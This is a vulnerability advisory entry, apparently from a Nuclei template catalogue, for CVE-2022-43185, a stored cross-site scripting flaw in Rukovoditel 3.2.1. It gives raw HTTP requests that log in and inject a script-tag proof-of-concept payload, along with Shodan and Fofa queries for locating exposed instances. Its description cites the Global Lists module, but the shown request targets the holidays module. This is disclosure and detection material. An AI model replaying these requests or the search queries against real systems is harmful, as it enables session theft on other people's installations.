| Title | Rukovoditel <= 3.2.1 - Cross-Site Scripting |
|---|---|
| Author | r3Y3r53 |
| Severity | Medium |
| Impact | Authenticated attackers can inject malicious JavaScript through the Name parameter in Global Lists that executes in other users' browsers when they view the stored content, potentially stealing session tokens or performing unauthorized actions in Rukovoditel project management system. |
| Remediation | Upgrade Rukovoditel to a version higher than 3.2.1 or apply the vendor-provided patch to mitigate the XSS vulnerability. |
| CVSS Score | 5.4 |
| EPSS Score | 0.04792 |
| CVE ID | CVE-2022-43185 |
| CWE ID | CWE-79 |
| Shodan Query | http.favicon.hash:-1499940355 |
| Fofa Query | icon_hash=-1499940355 |
| Tags | cve cve2022 rukovoditel stored-xss xss authenticated vuln |
A stored cross-site scripting (XSS) vulnerability in the Global Lists feature (/index.php?module=global_lists/lists) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter after clicking “Add”.
GET /index.php?module=users/login HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Mobile/15E148 Safari/604.1
Connection: close
Accept-Encoding: gzip
POST /index.php?module=users/login&action=login HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; WOW64; rv:41.0) Gecko/20100101 Firefox/140.0.2 (x64 de)
Connection: close
Content-Length: 57
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
form_session_token=2pWbSd&username=Li6O1x&password=XSybDJ
POST /index.php?module=holidays/holidays&action=save&token=2pWbSd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:1.9.7.20) Gecko/ Firefox/3.6.5
Connection: close
Content-Length: 126
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
form_session_token=2pWbSd&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&start_date=2023-05-22&end_date=2023-05-31
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-43185.yaml
🦈 Packet Capture: ⬇️ Download cve-2022-43185.pcap
N/AN/A